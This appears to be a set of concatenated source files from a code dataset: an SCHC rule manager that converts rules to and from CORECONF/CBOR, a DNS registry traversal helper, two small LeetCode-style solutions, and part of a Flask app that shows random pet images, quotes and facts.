l2_word_sid in rule:\n l2_word = rule[l2_word_sid]\n if l2_word != 8:\n raise ValueError(\"OpenSCHC only support 8 bit long l2 words\")\n else:\n #print (\"L2 Word set to 8 by default\")\n l2_word = 8\n\n direction_sid = self.sid_search_for(name=\"/ietf-schc:schc/rule/direction\", space=\"data\") - sid_ref\n direction = self.sid_search_sid(rule[direction_sid], short=True)\n\n if direction == 'di-up':\n arule[T_FRAG][T_FRAG_DIRECTION] = T_DIR_UP\n elif direction == 'di-down':\n arule[T_FRAG][T_FRAG_DIRECTION] = T_DIR_DW\n else:\n raise ValueError (\"Unknown fragmentation rule direction\", direction)\n\n dtag_size_sid = self.sid_search_for(name=\"/ietf-schc:schc/rule/dtag-size\", space=\"data\") - sid_ref\n if dtag_size_sid in rule:\n arule[T_FRAG][T_FRAG_PROF][T_FRAG_DTAG_SIZE] = rule[dtag_size_sid]\n else:\n arule[T_FRAG][T_FRAG_PROF][T_FRAG_DTAG_SIZE] = 0\n\n w_size_sid = self.sid_search_for(name=\"/ietf-schc:schc/rule/w-size\", space=\"data\") - sid_ref\n if w_size_sid in rule:\n arule[T_FRAG][T_FRAG_PROF][T_FRAG_W_SIZE] = rule[w_size_sid]\n else:\n arule[T_FRAG][T_FRAG_PROF][T_FRAG_W_SIZE] = 0\n\n fcn_size_sid = self.sid_search_for(name=\"/ietf-schc:schc/rule/fcn-size\", space=\"data\") - sid_ref\n if fcn_size_sid in rule:\n arule[T_FRAG][T_FRAG_PROF][T_FRAG_FCN] = rule[fcn_size_sid]\n else:\n raise ValueError(\"FCN must be specified\")\n\n rcs_algo_sid = self.sid_search_for(name=\"/ietf-schc:schc/rule/rcs-algorithm\", space=\"data\") - sid_ref\n if rcs_algo_sid in rule:\n rcs_algo = self.sid_search_sid(rule[rcs_algo_sid], short=True)\n arule[T_FRAG][T_FRAG_PROF][T_FRAG_MIC] = self.openschc_id(rcs_algo)\n else:\n arule[T_FRAG][T_FRAG_PROF][T_FRAG_MIC] = T_FRAG_RFC8724\n\n max_pkt_size_sid = self.sid_search_for(name=\"/ietf-schc:schc/rule/maximum-packet-size\", space=\"data\") - sid_ref\n if max_pkt_size_sid in rule:\n arule[T_FRAG][T_FRAG_PROF][T_MAX_PACKET_SIZE] = rule[max_pkt_size_sid]\n else:\n arule[T_FRAG][T_FRAG_PROF][T_MAX_PACKET_SIZE] = 1280\n\n window_size_sid = self.sid_search_for(name=\"/ietf-schc:schc/rule/window-size\", space=\"data\") - sid_ref\n if window_size_sid in rule:\n arule[T_FRAG][T_FRAG_PROF][T_FRAG_WINDOW_SIZE] = rule[window_size_sid]\n else:\n arule[T_FRAG][T_FRAG_PROF][T_FRAG_WINDOW_SIZE] = 2**arule[T_FRAG][T_FRAG_PROF][T_FRAG_FCN] - 1\n if arule[T_FRAG][T_FRAG_PROF][T_FRAG_WINDOW_SIZE] < 1: #case if W is 0 or 1\n arule[T_FRAG][T_FRAG_PROF][T_FRAG_WINDOW_SIZE] = 1\n \n max_inter_frame_sid = self.sid_search_for(name=\"/ietf-schc:schc/rule/max-interleaved-frames\", space=\"data\") - sid_ref\n if max_inter_frame_sid in rule:\n arule[T_FRAG][T_FRAG_PROF][T_MAX_INTER_FRAME] = rule[max_inter_frame_sid]\n else:\n 
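# default when max-interleaved-frames is absent: a single frame at a time\n 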
arule[T_FRAG][T_FRAG_PROF][T_MAX_INTER_FRAME] = 1\n\n inac_timer_sid = self.sid_search_for(name=\"/ietf-schc:schc/rule/inactivity-timer\", space=\"data\") - sid_ref\n if inac_timer_sid in rule:\n inac_timer = rule[inac_timer_sid]\n tick_duration_sid = self.sid_search_for(name=\"/ietf-schc:schc/rule/inactivity-timer/ticks-duration\", space=\"data\") - inac_timer_sid\n tick_number_sid = self.sid_search_for(name=\"/ietf-schc:schc/rule/inactivity-timer/ticks-numbers\", space=\"data\") - inac_timer_sid\n \n if tick_duration_sid in inac_timer:\n tick_duration = inac_timer[tick_duration_sid]\n else:\n tick_duration = 20\n\n if tick_number_sid in inac_timer:\n tick_number = inac_timer[tick_number_sid]\n else:\n tick_number = 600 # Value to be checked\n\n inactivity_timer = int(tick_number * (2**tick_duration / 10**6))\n else:\n inactivity_timer = 12 * 60 * 60 # default timer in seconds\n\n retrans_timer_sid = self.sid_search_for(name=\"/ietf-schc:schc/rule/retransmission-timer\", space=\"data\") - sid_ref\n if retrans_timer_sid in rule:\n tick_duration_sid = self.sid_search_for(name=\"/ietf-schc:schc/rule/retransmission-timer/ticks-duration\", space=\"data\") - retrans_timer_sid\n tick_number_sid = self.sid_search_for(name=\"/ietf-schc:schc/rule/retransmission-timer/ticks-numbers\", space=\"data\") - retrans_timer_sid\n \n if tick_duration_sid in inac_timer:\n tick_duration = inac_timer[tick_duration_sid]\n else:\n tick_duration = 20\n\n if tick_number_sid in inac_timer:\n tick_number = inac_timer[tick_number_sid]\n else:\n tick_number = 60 # Value to be checked\n\n retransmission_timer = int(tick_number * (2**tick_duration / 10**6))\n\n else:\n retransmission_timer = 1 * 60 * 60 # default timer in seconds\n arule[T_FRAG][T_FRAG_PROF][T_FRAG_TIMEOUT] = retransmission_timer\n\n max_ack_req_sid = self.sid_search_for(name=\"/ietf-schc:schc/rule/max-ack-requests\", space=\"data\") - sid_ref\n if max_ack_req_sid in rule:\n arule[T_FRAG][T_FRAG_PROF][T_FRAG_MAX_RETRY] = rule[max_ack_req_sid]\n else:\n arule[T_FRAG][T_FRAG_PROF][T_FRAG_MAX_RETRY] = 4 # openSCHC default value\n\n if frag_mod_id == 'fragmentation-mode-no-ack':\n arule[T_FRAG][T_FRAG_MODE] = T_FRAG_NO_ACK\n elif frag_mod_id == 'fragmentation-mode-ack-always':\n arule[T_FRAG][T_FRAG_MODE] = T_FRAG_ACK_ALWAYS\n elif frag_mod_id == 'fragmentation-mode-ack-on-error':\n arule[T_FRAG][T_FRAG_MODE] = T_FRAG_ACK_ON_ERROR\n\n tile_size_sid = self.sid_search_for(name=\"/ietf-schc:schc/rule/tile-size\", space=\"data\") - sid_ref\n if tile_size_sid in rule:\n arule[T_FRAG][T_FRAG_PROF][T_FRAG_TILE] = rule[max_ack_req_sid]\n else:\n arule[T_FRAG][T_FRAG_PROF][T_FRAG_TILE] = 10 # openSCHC default value\n\n tile_in_all1_sid = self.sid_search_for(name=\"/ietf-schc:schc/rule/tile-in-all-1\", space=\"data\") - sid_ref\n if tile_in_all1_sid in rule:\n tile_in = self.sid_search_sid(rule[max_ack_req_sid], short=True)\n if tile_in == \"all-1-data-no\":\n arule[T_FRAG][T_FRAG_PROF][T_FRAG_LAST_TILE_IN_ALL1] = False\n if tile_in == \"all-1-data-yes\":\n arule[T_FRAG][T_FRAG_PROF][T_FRAG_LAST_TILE_IN_ALL1] = True\n if tile_in == \"all-1-data-sender-choice\":\n arule[T_FRAG][T_FRAG_PROF][T_FRAG_LAST_TILE_IN_ALL1] = None\n else:\n arule[T_FRAG][T_FRAG_PROF][T_FRAG_LAST_TILE_IN_ALL1] = False\n\n ack_behavior_sid = self.sid_search_for(name=\"/ietf-schc:schc/rule/tile-in-all-1\", space=\"data\") - sid_ref\n if ack_behavior_sid in rule:\n ack_behavior = self.sid_search_sid(rule[max_ack_req_sid], short=True)\n\n if ack_behavior == \"ack-behavior-after-all-0\":\n 
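# recognized here, but flagged as not implemented by the warning below\n 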
arule[T_FRAG][T_FRAG_PROF][T_FRAG_ACK_BEHAVIOR] = T_FRAG_AFTER_ALL0\n print (\"Warning not implemented\")\n elif ack_behavior == \"ack-behavior-after-all-1\":\n arule[T_FRAG][T_FRAG_PROF][T_FRAG_ACK_BEHAVIOR] = T_FRAG_AFTER_ALL1\n elif ack_behavior == \"ack-behavior-by-layer2\":\n arule[T_FRAG][T_FRAG_PROF][T_FRAG_ACK_BEHAVIOR] = T_FRAG_AFTER_ANY\n print (\"Warning not implemented\")\n else:\n raise ValueError (\"Unknwon Ack Behavior\")\n else:\n arule[T_FRAG][T_FRAG_PROF][T_FRAG_ACK_BEHAVIOR] = T_FRAG_AFTER_ALL1 # openSCHC default value\n \n else:\n raise ValueError(\"unkwown fragmentation mode\", frag_mod_id)\n\n elif nature == \"nature-no-compression\":\n arule [T_NO_COMP] = []\n else:\n raise ValueError (\"Unknown rule nature SID\", nature)\n\n SoR.append(arule) # add to the set of rules\n\n\n #pprint.pprint(SoR)\n \n self.Add(device=device, dev_info=SoR)\n\n\n def to_coreconf (self, deviceID=\"None\"):\n \"\"\"\n Dump the rules in CORECONF format the rules inside the rule manager for a specific device.\n \"\"\"\n import binascii\n\n def dictify_cbor (val, ref_id):\n cbor_data = b''\n if type(val) != list:\n val = [val]\n\n tv_array = b''\n for i in range(len(val)):\n\n if type(val[i]) == int:\n x = val[i]\n r = b''\n while x != 0:\n r = struct.pack('!B', x&0xFF) + r\n x >>= 8\n elif type(val[i]) == bytes:\n r = val[i]\n\n tv_array += b'\\xA2' + \\\n cbor.dumps(self.sid_search_for(name=ref_id+\"/index\", space=\"data\") - self.sid_search_for(name=ref_id, space=\"data\")) + \\\n cbor.dumps(i)\n\n tv_array += \\\n cbor.dumps(self.sid_search_for(name=ref_id+\"/value\", space=\"data\") - self.sid_search_for(name=ref_id, space=\"data\")) + \\\n cbor.dumps(r)\n\n\n tv_array = self.cbor_header(0b100_00000, len(val)) + tv_array\n return tv_array\n \n module_sid = self.sid_search_for(name=\"/ietf-schc:schc\", space=\"data\")\n rule_sid = self.sid_search_for(name=\"/ietf-schc:schc/rule\", space=\"data\")\n\n\n for dev in self._ctxt:\n #print (\"*\"*40)\n #print (\"Device:\", dev[\"DeviceID\"])\n\n rule_count = 0\n full_rules = b''\n for rule in dev[\"SoR\"]:\n rule_count += 1\n if T_COMP in rule:\n entry_sid = self.sid_search_for(name=\"/ietf-schc:schc/rule/entry\", space=\"data\")\n \n nb_entry = 0\n rule_content = b''\n for e in rule[T_COMP]:\n nb_elm = 0\n nb_entry += 1\n\n entry_cbor = \\\n cbor.dumps(self.sid_search_for(name=\"/ietf-schc:schc/rule/entry/field-id\", space=\"data\") - entry_sid) + \\\n cbor.dumps(self.sid_search_for(name=YANG_ID[e[T_FID]][1], space=\"identity\")) \n nb_elm += 1\n\n l=e[T_FL]\n if type(l) == int:\n entry_cbor += \\\n cbor.dumps(self.sid_search_for(name=\"/ietf-schc:schc/rule/entry/field-length\", space=\"data\") - entry_sid) + \\\n cbor.dumps(l)\n elif type(l) == str:\n entry_cbor += \\\n cbor.dumps(self.sid_search_for(name=\"/ietf-schc:schc/rule/entry/field-length\", space=\"data\") - entry_sid) + \\\n struct.pack(\"!BB\", 0xD8, 45) + \\\n cbor.dumps(self.sid_search_for(name=YANG_ID[l][1], space=\"identity\")) \n\n #raise ValueError(\"Field ID not defined\")\n else:\n raise ValueError(\"unknown field length value\")\n nb_elm += 1\n\n entry_cbor += \\\n cbor.dumps(self.sid_search_for(name=\"/ietf-schc:schc/rule/entry/field-position\", space=\"data\") - entry_sid) + \\\n struct.pack('!B', e[T_FP])\n nb_elm += 1\n \n entry_cbor += \\\n cbor.dumps(self.sid_search_for(name=\"/ietf-schc:schc/rule/entry/direction-indicator\", space=\"data\") - entry_sid) + \\\n cbor.dumps(self.sid_search_for(name=YANG_ID[e[T_DI]][1], space=\"identity\")) \n nb_elm += 1\n\n 
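# key: matching-operator, delta-encoded against the entry SID; value: the MO's identity SID\n 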
entry_cbor += \\\n cbor.dumps(self.sid_search_for(name=\"/ietf-schc:schc/rule/entry/matching-operator\", space=\"data\") - entry_sid) + \\\n cbor.dumps(self.sid_search_for(name=YANG_ID[e[T_MO]][1], space=\"identity\")) \n nb_elm += 1\n\n if T_MO_VAL in e:\n mo_val_cbor = dictify_cbor(e[T_MO_VAL], \"/ietf-schc:schc/rule/entry/matching-operator-value\")\n entry_cbor += \\\n cbor.dumps(self.sid_search_for(name=\"/ietf-schc:schc/rule/entry/matching-operator-value\", space=\"data\") - entry_sid) + \\\n mo_val_cbor\n nb_elm += 1\n\n entry_cbor += \\\n cbor.dumps(self.sid_search_for(name=\"/ietf-schc:schc/rule/entry/comp-decomp-action\", space=\"data\") - entry_sid) + \\\n cbor.dumps(self.sid_search_for(name=YANG_ID[e[T_CDA]][1], space=\"identity\")) \n nb_elm += 1\n\n if T_TV in e and e[T_TV] != None:\n tv_cbor = dictify_cbor(e[T_TV], \"/ietf-schc:schc/rule/entry/target-value\")\n\n entry_cbor += \\\n cbor.dumps(self.sid_search_for(name=\"/ietf-schc:schc/rule/entry/target-value\", space=\"data\") - entry_sid) + \\\n tv_cbor\n nb_elm += 1\n \n entry_cbor = self.cbor_header (0b101_00000, nb_elm) + entry_cbor # header MAP and size\n rule_content += entry_cbor\n\n rule_content = b'\\xA4' + \\\n cbor.dumps(self.sid_search_for(name=\"/ietf-schc:schc/rule/entry\", space=\"data\") - rule_sid) + \\\n self.cbor_header(0b100_00000, nb_entry) + rule_content + \\\n cbor.dumps(self.sid_search_for(name=\"/ietf-schc:schc/rule/rule-id-value\", space=\"data\") - rule_sid) +\\\n cbor.dumps(rule[T_RULEID]) +\\\n cbor.dumps(self.sid_search_for(name=\"/ietf-schc:schc/rule/rule-id-length\", space=\"data\") - rule_sid) +\\\n cbor.dumps(rule[T_RULEIDLENGTH]) +\\\n cbor.dumps(self.sid_search_for(name=\"/ietf-schc:schc/rule/rule-nature\", space=\"data\") - rule_sid) +\\\n cbor.dumps(self.sid_search_for(name= \"nature-compression\", space=\"identity\")) \n elif T_FRAG in rule:\n nb_elm = 3\n rule_content = \\\n cbor.dumps(self.sid_search_for(name=\"/ietf-schc:schc/rule/rule-id-value\", space=\"data\") - rule_sid) +\\\n cbor.dumps(rule[T_RULEID]) +\\\n cbor.dumps(self.sid_search_for(name=\"/ietf-schc:schc/rule/rule-id-length\", space=\"data\") - rule_sid) +\\\n cbor.dumps(rule[T_RULEIDLENGTH]) +\\\n cbor.dumps(self.sid_search_for(name=\"/ietf-schc:schc/rule/rule-nature\", space=\"data\") - rule_sid) +\\\n cbor.dumps(self.sid_search_for(name= \"nature-fragmentation\", space=\"identity\")) \n\n rule_content += \\\n cbor.dumps(self.sid_search_for(name=\"/ietf-schc:schc/rule/direction\", space=\"data\") - rule_sid) +\\\n cbor.dumps(self.sid_search_for(name=YANG_ID[rule[T_FRAG][T_FRAG_DIRECTION]][1], space=\"identity\")) \n nb_elm += 1\n \n rule_content += \\\n cbor.dumps(self.sid_search_for(name=\"/ietf-schc:schc/rule/rcs-algorithm\", space=\"data\") - rule_sid) +\\\n cbor.dumps(self.sid_search_for(name=YANG_ID[rule[T_FRAG][T_FRAG_PROF][T_FRAG_MIC]][1], space=\"identity\")) \n nb_elm += 1\n\n rule_content += \\\n cbor.dumps(self.sid_search_for(name=\"/ietf-schc:schc/rule/dtag-size\", space=\"data\") - rule_sid) +\\\n cbor.dumps(rule[T_FRAG][T_FRAG_PROF][T_FRAG_DTAG_SIZE])\n nb_elm += 1\n\n if rule[T_FRAG][T_FRAG_MODE] in [T_FRAG_ACK_ALWAYS, T_FRAG_ACK_ON_ERROR]:\n rule_content += \\\n cbor.dumps(self.sid_search_for(name=\"/ietf-schc:schc/rule/w-size\", space=\"data\") - rule_sid) +\\\n cbor.dumps(rule[T_FRAG][T_FRAG_PROF][T_FRAG_W_SIZE])\n nb_elm += 1\n\n rule_content += \\\n cbor.dumps(self.sid_search_for(name=\"/ietf-schc:schc/rule/fcn-size\", space=\"data\") - rule_sid) +\\\n 
cbor.dumps(rule[T_FRAG][T_FRAG_PROF][T_FRAG_FCN])\n nb_elm += 1\n\n rule_content += \\\n cbor.dumps(self.sid_search_for(name=\"/ietf-schc:schc/rule/fragmentation-mode\", space=\"data\") - rule_sid) +\\\n cbor.dumps(self.sid_search_for(name= YANG_ID[rule[T_FRAG][T_FRAG_MODE]][1], space=\"identity\")) \n nb_elm += 1\n \n rule_content = self.cbor_header(0b101_00000, nb_elm) + rule_content\n elif T_NO_COMP in rule:\n rule_content = rule_content = self.cbor_header(0b101_00000, 3) +\\\n cbor.dumps(self.sid_search_for(name=\"/ietf-schc:schc/rule/rule-id-value\", space=\"data\") - rule_sid) +\\\n cbor.dumps(rule[T_RULEID]) +\\\n cbor.dumps(self.sid_search_for(name=\"/ietf-schc:schc/rule/rule-id-length\", space=\"data\") - rule_sid) +\\\n cbor.dumps(rule[T_RULEIDLENGTH]) +\\\n cbor.dumps(self.sid_search_for(name=\"/ietf-schc:schc/rule/rule-nature\", space=\"data\") - rule_sid) +\\\n cbor.dumps(self.sid_search_for(name= \"nature-no-compression\", space=\"identity\")) \n else:\n raise ValueError(\"unkwon rule\")\n\n full_rules += rule_content \n \n coreconf = b'\\xA1' + cbor.dumps(module_sid) + b'\\xA1' + cbor.dumps(rule_sid - module_sid) \n\n array_header = self.cbor_header(0b100_00000, rule_count) # array\n\n coreconf += array_header+full_rules\n return coreconf\n # end of CORECONF\n\n def convert_to_json(self, jcc, delta=0, name_ref=\"\"):\n if type(jcc) is dict:\n json_dict = {}\n for k, v in jcc.items():\n sid_description = self.sid_search_sid(k+delta)\n value = self.convert_to_json(v, k+delta, sid_description)\n key = sid_description.replace(name_ref+'/', '')\n\n json_dict[key] = value\n return json_dict\n elif type(jcc) is list:\n json_list = []\n for e in jcc:\n value = self.convert_to_json(e, delta, name_ref )\n json_list.append(value)\n return json_list\n elif type(jcc) is int:\n node_type = self.get_yang_type(name_ref)\n\n if node_type in [\"int\", \"union\"]: #/!\\ to be improved, suppose that union contains an int\n return jcc\n elif node_type == \"identifier\":\n sid_ref = self.sid_search_sid(jcc)\n return sid_ref\n else:\n raise ValueError(name_ref, node_type, \"not a leaf\")\n\n elif type(jcc) is bytes:\n return base64.b64encode(jcc).decode()\n elif type(jcc) is cbor.CBORTag: # TAG == 45, an identifier not an int.\n if jcc.tag == 45:\n sid_ref = self.sid_search_sid(jcc.value)\n return sid_ref\n else:\n raise ValueError(\"CBOR Tag unknown:\", jcc.tag)\n else:\n raise ValueError (\"Unknown type\", type(jcc)) \n\n def get_cc (self, sor, sid=None, keys = [], delta=0, ident=1, value=None):\n #print (\"-\"*ident, sid, keys)\n\n if sid == delta:\n if value == None:\n return sor\n else:\n sor = value\n return True\n\n if type(sor) is dict:\n result = None\n\n if len(keys) == 0 and sid-delta in sor:\n if value == None:\n return {sid: sor[sid-delta]}\n else: # change the value\n sor[sid-delta] = value\n return True\n\n if len(keys) == 0 and value: # element is not in the object \n #print (\"add the element\")\n sor[sid-delta] = value\n return True\n\n for s, v in sor.items():\n #print ('.'*ident, s, v)\n\n # if s+delta == sid:\n # return {s: v}\n\n if s+delta in self.sid_key_mapping: # A list we have keys, look for specific entry\n # Raise an err if the number of SID keys are not the same as the number of keys in self.sid_key_mapping\n if len(self.sid_key_mapping[s+delta]) != len(keys):\n raise ValueError (\"Not enough keys values to locate the SID\")\n\n key_search = {}\n for k in self.sid_key_mapping[s+delta]:\n key_search[k-(s+delta)] = keys.pop(0)\n\n #print (\"!\"*ident, key_search)\n\n 
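# linear scan: keep the first list instance whose items contain all requested key/value pairs\n 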
                    found_st = None\n                    found_index = 0\n                    for l in sor[s]:\n                        #print (\"+\"*ident, l)\n                        if key_search.items() <= l.items(): # searched items included in leaf\n                            found_st = l\n                            break\n                        found_index += 1\n                    if found_st:\n                        if sid == s+delta:\n                            if value == None:\n                                # keys must be adapted to take the delta coding into account\n                                st_delta_adjusted = {}\n                                # Adjust the keys by expanding the complete SID (completeSID = s + k + delta)\n                                for k, v in found_st.items():\n                                    st_delta_adjusted[s+k+delta] = v\n                                return st_delta_adjusted\n                            else:\n                                sor[s][found_index] = value\n                                return True\n                        return self.get_cc(found_st, delta=s+delta, ident=ident+1, sid=sid, keys=keys, value=value)\n                    else:\n                        if value != None:\n                            print (\"add it\", key_search)\n                            new_struct = key_search.copy()\n                            for new_key, new_value in value.items():\n                                if new_key in new_struct:\n                                    print (\"key leaf \", new_key+delta, \"already set to key value\")\n                                else: \n                                    new_struct[new_key] = new_value\n\n                            sor[s].append(new_struct)\n                            return True\n\n                else: # A set of containers, take all elements\n                    if result == None:\n                        result = self.get_cc (v, sid, keys, delta+s, ident+1, value)\n\n                if result != None:\n                    return result\n\n    def manipulate_coreconf(self, sid, device=None, keys=None, value=None, validate=None):\n        cconf = self.to_coreconf(device)\n\n        if type(sid) is str:\n            sid = self.sid_search_for (sid, space='data')\n\n        keys_sid = []\n        if keys:\n            for e in keys:\n                if type(e) is str: # if the string is a YANG ID, change it to the SID value\n                    k_sid = self.sid_search_for(e, space=\"identity\")\n                    if k_sid != None:\n                        e = k_sid\n                keys_sid.append(e)\n\n        if type(value) is str:\n            value_sid = self.sid_search_for(value, space=\"identity\")\n            if value_sid:\n                value = value_sid\n\n        json_cconf = cbor.loads(cconf)\n        result = self.get_cc(sor=json_cconf, sid=sid, keys=keys_sid, value=value)\n\n        if value != None and result == True:\n            if validate:\n                inst = validate.from_raw(self.convert_to_json(json_cconf))\n                inst.validate() # if wrong, raises an error\n\n            # remove the current rule\n            for i in range(len(self._ctxt)):\n                dev = self._ctxt[i]\n                #print (\"Device:\", dev[\"DeviceID\"])\n                if dev['DeviceID'] == device:\n                    self._ctxt.pop(i)\n                    break\n            # add the modified one\n            self.from_coreconf(device=device, dev_info=json_cconf)\n        return result\n","repo_name":"openschc/openschc","sub_path":"src/gen_rulemanager.py","file_name":"gen_rulemanager.py","file_ext":"py","file_size_in_byte":76849,"program_lang":"python","lang":"en","doc_type":"code","stars":24,"dataset":"github-code","pt":"53"} +{"seq_id":"74254353447","text":"import re\nfrom djdns.resolver import Resolver\n\ndef traverse(data, loader, query):\n    '''\n    data - page to start with\n    loader - callback(uri) -> page data\n    query - query text to scan for\n\n    Generator that outputs branch dicts.
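 Each branch's selector is treated as a regular expression and matched against the query with re.search.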
 You can filter recursion\n    by having your loader function return None.\n    '''\n    for branch in data['branches']:\n        selector = branch['selector']\n        if re.search(selector, query):\n            # Branch matches regex\n            yield branch\n            for b in _from_targets(branch, loader, query):\n                yield b\n\ndef _from_targets(branch, loader, query):\n    '''\n    Generator that returns branches from a source branch's target.\n    '''\n    for target_uri in branch['targets']:\n        target = loader(target_uri)\n\n        if target == None:\n            continue\n        elif isinstance(target, Resolver):\n            # Opaque resolver, such as dns:// URI.\n            yield target\n        else:\n            # Registry page.\n            for b in traverse(target, loader, query):\n                yield b\n","repo_name":"campadrenalin/python-djdns","sub_path":"djdns/traversal.py","file_name":"traversal.py","file_ext":"py","file_size_in_byte":1066,"program_lang":"python","lang":"en","doc_type":"code","stars":28,"dataset":"github-code","pt":"53"} +{"seq_id":"4007114091","text":"# find all pairs of integers whose sum is equal to the given number\ndef twosum(nums,t):\n    for i in range(len(nums)):\n        for j in range(i+1,len(nums)):\n            if(nums[i]+nums[j]==t):\n                print(nums[i],nums[j])\n                print(i, j)\nmylist= list(map(int,input().split(\" \")))\ntarget=int(input(\"enter the target value: \"))\ntwosum(mylist,target)","repo_name":"anirbang324/Python_problem_solving_and_DSA","sub_path":"list/two sum(leetcode).py","file_name":"two sum(leetcode).py","file_ext":"py","file_size_in_byte":430,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"37023665746","text":"\"\"\"\nk-diff-pairs-in-an-array\n\"\"\"\nclass Solution:\n    def findPairs(self, nums, k):\n        \"\"\"\n        :type nums: List[int]\n        :type k: int\n        :rtype: int\n        \"\"\"\n        return self.s_1(k, nums)\n\n    def s_1(self, k, nums):\n        \"\"\"\n        Two pointers\n        :param k:\n        :param nums:\n        :return:\n        \"\"\"\n        if len(nums) < 2:\n            return 0\n        ans = set()\n        nums.sort()\n        i, j = 0, 1\n        while j < len(nums):\n            if nums[j] - nums[i] == k:\n                ans.add((nums[i], nums[j]))\n                i, j = i + 1, i + 2\n            elif nums[j] - nums[i] > k:\n                i, j = i + 1, i + 2\n            else:\n                j += 1\n        return len(ans)\n\n\nif __name__ == \"__main__\":\n    test = Solution()\n    a = test.findPairs([1, 3, 1, 5, 4], 0)\n    print(a)","repo_name":"sdlbp/LeetCode","sub_path":"leetcode-algorithms/532.
 K-diff Pairs in an Array/k-diff-pairs-in-an-array.py","file_name":"k-diff-pairs-in-an-array.py","file_ext":"py","file_size_in_byte":840,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"5918996623","text":"# Team ruffLife: Xiaojie(Aaron) Li, Michelle Tang, Bo Hui Lu, Kaitlin Wan\n# SoftDev1 pd6\n# P#01 -- arRESTed Development\n# 2018-11-30\n\nimport os\nimport json\nimport urllib.request\n\n\nfrom util import userMethods\n\nfrom flask import Flask, request, render_template, session, url_for, redirect, flash\n\n# instantiate flask app\napp = Flask(__name__)\n\n# generate random key\napp.secret_key = os.urandom(32)\nusername = flashMessage = \"\"\nliked_cats = liked_dogs = liked_quotes = liked_facts = \"\"\nimages = texts = []\n\n# root route\n@app.route(\"/\")\ndef home():\n    \"\"\"\n    If user is logged in, redirect them to their feed.\n    If not logged in, prompt the login page.\n    \"\"\"\n    if \"user\" in session:\n        return redirect(\"/feed\")\n    return render_template(\"index.html\")\n\n# authentication route\n@app.route(\"/authenticate\", methods = [\"POST\", \"GET\"])\ndef authenticate():\n    \"\"\"\n    If a user enters the authenticate route manually (without logging in), redirect them back to the right route.\n    If a user enters the authenticate route after submitting a form:\n    * if the username and password are found in the database, redirect to their feed\n    * if the username and/or the password is not found, flash an appropriate message and redirect to login\n    \"\"\"\n\n    loginStatus = ''\n    global username\n\n    # if user got here manually, redirect to root\n    if request.method == \"GET\" or \"user\" not in request.form.keys():\n        return redirect('/')\n\n    # check login creation or login\n    if \"pass2\" in request.form.keys():\n        print(\"\\n\\nCREATING ACCOUNT\\n\")\n        loginStatus = userMethods.createAccount(request.form[\"user\"], request.form[\"pass1\"], request.form[\"pass2\"])\n    else:\n        print(\"\\n\\nCHECKING INFO\\n\")\n        loginStatus = userMethods.checkInfo(request.form[\"user\"], request.form[\"pass\"])\n\n    # if the user successfully logs in, redirect to their feed\n    if loginStatus == \"Account creation successful\":\n        session[\"user\"] = request.form[\"user\"]\n        username = request.form[\"user\"]\n        session.pop('_flashes', None)\n        flash(loginStatus)\n        return render_template(\"index.html\")\n    elif loginStatus == \"Login Successful\":\n        session[\"user\"] = request.form[\"user\"]\n        username = request.form[\"user\"]\n        session.pop('_flashes', None)\n        flash(loginStatus)\n        return redirect(\"/feed\")\n    else:\n        flash(loginStatus)\n        return redirect(\"/\")\n# for logged in users: their complete page\n@app.route(\"/feed\", methods=[\"GET\"])\ndef feed():\n    global username\n    global liked_cats\n    global liked_dogs\n    global liked_quotes\n    global liked_facts\n    global dict\n    global data\n    global memes\n    global facts\n    global cat\n    global images\n    global texts\n\n    # if user not logged in redirect them\n    if not(\"user\" in session):\n        session.pop('_flashes', None)\n        flash(\"You are not logged in.\")\n        return redirect(\"/\")\n\n    url = \"https://random.dog/woof.json\"\n    status = True\n    while(status):\n        straw = urllib.request.urlopen(url)\n        straw = straw.read()\n        dict = json.loads(straw)\n        print(dict[\"url\"][-3:])\n        if(dict[\"url\"][-3:] != \"mp4\"):\n            status = False\n\n    url = \"https://aws.random.cat/meow\"\n    straw = urllib.request.urlopen(url)\n    straw = straw.read()\n    cat = json.loads(straw)\n\n    url = \"https://catfact.ninja/fact\"\n    straw = urllib.request.urlopen(url)\n    straw =
straw.read()\n cat_fact = json.loads(straw)\n\n url = \"https://dog-api.kinduff.com/api/facts?number=1\"\n straw = urllib.request.urlopen(url)\n straw = straw.read()\n dog_fact = json.loads(straw)\n\n url = urllib.request.urlopen(\"https://favqs.com/api/qotd\")\n data = json.loads(url.read().decode())\n data = data[\"quote\"]\n\n fn = open(\"./api/meme.txt\", \"r\")\n mykeyn = fn.readline().strip()\n url = \"http://api.giphy.com/v1/gifs/random?api_key=\" + mykeyn + \"&tag=meme&rating=pg\"\n #print(\"HIII\")\n straw = urllib.request.urlopen(url)\n straw = straw.read()\n memes = json.loads(straw)\n\n\n url = \"http://randomuselessfact.appspot.com/random.json?language=en\"\n straw = urllib.request.urlopen(url)\n straw = straw.read()\n facts = json.loads(straw)\n # print(facts[\"text\"])\n urls = userMethods.likedImages(username)\n # print(urls)\n\n liked_cats = cat[\"file\"]\n # print(\"\\n\\nPRINTING LIKED_CATS\\n\")\n # print(liked_cats)\n liked_dogs = dict[\"url\"]\n liked_quotes = data[\"body\"]\n liked_facts = facts[\"text\"]\n\n texts = userMethods.likedWords(username)\n texts = texts.split(\"|\")\n texts = texts[1:]\n images = userMethods.likedImages(username)\n images = images.split(\",\")\n images = images[1:]\n\n print(\"\\n-------------------\\n\" + username + \"\\n----------------------\\n\")\n print(\"\\nmeme url: \" + memes['data']['url'] + \"\\n\")\n print(\"\\ncat fact: \" + cat_fact['fact'] + \"\\n\")\n print(\"\\ndog fact: \")\n print(dog_fact['facts'])\n print(\"\\nquote: \" + data[\"body\"] + \"\\n\")\n print(\"----------------\\ntexts: \")\n print(texts)\n print(\"----------------\\nimages: \")\n print(images)\n return render_template(\"feed.html\",\n dog_link = dict['url'],\n cat_link = cat[\"file\"],\n quote = data[\"body\"],\n author = data[\"author\"],\n user = username,\n link = memes['data']['url'],\n em = memes['data']['embed_url'],\n fact = facts[\"text\"],\n catFact = cat_fact['fact'],\n dogFact = dog_fact['facts'][0],\n img_urls = images,\n text_texts = texts)\n\n# reload route will refresh page and go to appropriate section\n@app.route(\"/reload\", methods=[\"GET\", \"POST\"])\ndef reload():\n # check if logged in\n if not (\"user\" in session):\n session.pop('_flashes', None)\n flash(\"You are not logged in.\")\n return redirect(\"/\")\n if request.method == \"POST\":\n return redirect(\"/feed#doge\")\n else:\n return redirect(\"/feed#cat\")\n\n# reload route for facts and quotes, will refresh and 